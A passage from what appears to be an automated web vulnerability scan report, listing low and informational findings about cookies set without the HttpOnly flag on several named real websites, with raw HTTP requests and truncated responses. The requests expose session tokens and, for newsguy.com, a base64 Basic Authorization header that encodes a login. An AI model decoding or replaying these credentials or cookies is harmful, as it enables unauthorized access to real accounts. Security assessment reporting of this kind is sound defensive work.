The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pick/new/submit/sociable/?url={u}&name={t} HTTP/1.1
Host: www.thisnext.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:06 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: private
P3P: CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml", CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Set-Cookie: session=046f9657edcc992948bb669f4e6686bd; path=/
Set-Cookie: browser=173.193.214.243.1295930346514828; path=/; expires=Fri, 22-Jan-21 04:39:06 GMT
Connection: close
Content-Length: 19298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"

...[SNIP]...

14.170. http://www.w-w-i.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.w-w-i.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • THESESSION=104b6d5a3b663e017fccb9e7614f776c; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:55 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=104b6d5a3b663e017fccb9e7614f776c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 11624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Online Press Office</title>
<meta name="keywords" content="World Wi
...[SNIP]...

14.171. http://www.w-w-i.com/velux_5_oceans_2010_race/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.w-w-i.com
Path:   /velux_5_oceans_2010_race/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • THESESSION=7b2679674344bff40c7a2cdf1e0ad477; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=7b2679674344bff40c7a2cdf1e0ad477; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Velux 5 Oceans 2010 Race :: Online Press Office</title>
<meta name=
...[SNIP]...

14.172. http://www.yachtscoring.com/event_results_cumulative.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.yachtscoring.com
Path:   /event_results_cumulative.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • CFID=7018349;expires=Thu, 17-Jan-2041 04:42:50 GMT;path=/
  • CFTOKEN=92203677;expires=Thu, 17-Jan-2041 04:42:50 GMT;path=/
  • CFID=7018349;path=/
  • CFTOKEN=92203677;path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event_results_cumulative.cfm HTTP/1.1
Host: www.yachtscoring.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 25 Jan 2011 04:42:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=7018349;expires=Thu, 17-Jan-2041 04:42:50 GMT;path=/
Set-Cookie: CFTOKEN=92203677;expires=Thu, 17-Jan-2041 04:42:50 GMT;path=/
Set-Cookie: CFID=7018349;path=/
Set-Cookie: CFTOKEN=92203677;path=/
location: ./select_event.cfm?CFID=7018349&CFTOKEN=92203677
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">


   

14.173. http://www3.whdh.com/mobile/phoneforecast/settings.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www3.whdh.com
Path:   /mobile/phoneforecast/settings.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=b403bd4dcacdf2dc04e785e91ecaa8a7; path=/
  • WHDHSTR=10276375ee09de38c9ed3d9e2f331510; expires=Thu, 26-Jan-2012 00:10:25 GMT; path=/; domain=.whdh.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/phoneforecast/settings.php HTTP/1.1
Host: www3.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: WHDHSTR=10276375ee09de38c9ed3d9e2f331510; expires=Thu, 26-Jan-2012 00:10:25 GMT; path=/; domain=.whdh.com
Set-Cookie: PHPSESSID=b403bd4dcacdf2dc04e785e91ecaa8a7; path=/
Expires: Wed, 26 Jan 2011 00:10:25 GMT
Cache-Control: max-age=86400, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10202

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Mobile Alerts - Daily Phone Forecast Account Settings</title>
<meta name="publisher"
...[SNIP]...

14.174. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ANON_ID=alnYSwtZdPuoP7SpJnHoOn6TC7uVaZblA87K1ygX0f1hWyZaf6EZanRaimVUiRN9IbgAkGg1BT4ERS3XZcApBAXusAVvGZcoKa4EAukyTAwZbPf3HZdeC8vRYsIZcwZbZbUlgTx2pGMLGTUxSpnpnuGgneS4uRH3F5UIxyV2vItfFS4p24eqKnVPrweM91kBCNbZaOJZcDFjxos4ePmdX9ScRZcCH4xkEGVN30HIh9PAFi7B076lbqqZbZdvgymSbR4XnZaYtW7YU66NirjJYfbFR3Zd1VIDlOQtDHUTykSEIT; path=/; domain=.tribalfusion.com; expires=Mon, 25-Apr-2011 01:35:47 GMT;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=345683&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aDnW0LrwZayOnXwr1QHr2jw47YFSRv4Za7XcQkGtYZdRZcWf7wADFEVHJyPbI34C71hPcXHKqC4rKUR10ZauE2JtrnsNVwlCTDlBxKRo78YQefyFwV2spqhEjwpgWtMSLxFV7yjY44B29vthYSxQDZdm0Y0mEGGuq3vvM6sZbWWCBS9ygvc7XVZbdDZaekm5Kmxbh5WlcNUFZa1fiHcrP5N16q6mbZarKtmZagM8Uv3qPGsepQSrfNK9vOubwfVB3hYbZbKmqUUdsYdVgLIeb

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=alnYSwtZdPuoP7SpJnHoOn6TC7uVaZblA87K1ygX0f1hWyZaf6EZanRaimVUiRN9IbgAkGg1BT4ERS3XZcApBAXusAVvGZcoKa4EAukyTAwZbPf3HZdeC8vRYsIZcwZbZbUlgTx2pGMLGTUxSpnpnuGgneS4uRH3F5UIxyV2vItfFS4p24eqKnVPrweM91kBCNbZaOJZcDFjxos4ePmdX9ScRZcCH4xkEGVN30HIh9PAFi7B076lbqqZbZdvgymSbR4XnZaYtW7YU66NirjJYfbFR3Zd1VIDlOQtDHUTykSEIT; path=/; domain=.tribalfusion.com; expires=Mon, 25-Apr-2011 01:35:47 GMT;
Content-Type: text/html
Location: http://tag.admeld.com/pixel?admeld_adprovider_id=12&expiration=30days&custom_segment4=1&custom_segment504=1&redirect=http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615
Content-Length: 0
Connection: keep-alive


14.175. https://acc.newsguy.com/user/-/accnt_billing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_billing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_billing HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/customer_referrals
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22337

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Billing Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

14.176. https://acc.newsguy.com/user/-/accnt_contact

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_contact HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_billing
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 8709

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Contact Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

14.177. https://acc.newsguy.com/user/-/accnt_flash

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_flash

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_flash HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:13 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 11585

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Flash Report</TITLE>
<script src="/accnt_forms.js"></script>
<script src="/accnt_ref.js"></script>
<script src="/lotto.js"></script>
</HEAD>

<bo
...[SNIP]...

14.178. https://acc.newsguy.com/user/-/accnt_history

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_history

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_history HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_contact
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:44 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 5814

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Purchase History</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

14.179. https://acc.newsguy.com/user/-/customer_referrals

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/customer_referrals

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/customer_referrals HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:29 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17318

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Referral Credits</TITLE>
<script src="/referrals.js"></script>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#265
...[SNIP]...

14.180. https://acc.newsguy.com/user/-/referrals_cashout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/referrals_cashout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/referrals_cashout HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=obHFXmnhMbJX5LfJRNZRWemqopp0oWW0L4d3d924f

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:10 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3297

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Account Administration - CashOut! Referral Credits</title>
<meta NAME="description" CONTENT="Automatically read, post, de
...[SNIP]...

14.181. https://acc.newsguy.com/user/accnt_overview

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_overview HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:35 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Overview</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

14.182. https://acc.newsguy.com/user/accnt_renew

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_renew

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_renew HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Renew Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmargi
...[SNIP]...

14.183. https://acc.newsguy.com/user/accnt_settings

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_settings

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_settings HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Settings</TITLE>
<script src="/accnt_forms.js"></script>
<script language="JavaScript">
<!-- calculate available quotas by values type in
...[SNIP]...

14.184. https://acc.newsguy.com/user/accnt_signup_usenet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_signup_usenet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_signup_usenet HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:45 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Add a Usenet Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" le
...[SNIP]...

14.185. https://acc.newsguy.com/user/accnt_upgrade

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_upgrade

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_upgrade HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:42 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Upgrade My Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" left
...[SNIP]...

14.186. http://action.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
  • clid=2lebnns011706ch47d7o8wtv18e3v00g0o02050210f; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
  • orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
  • rdrlst=...[SNIP]...; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
  • sglst=...[SNIP]...; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

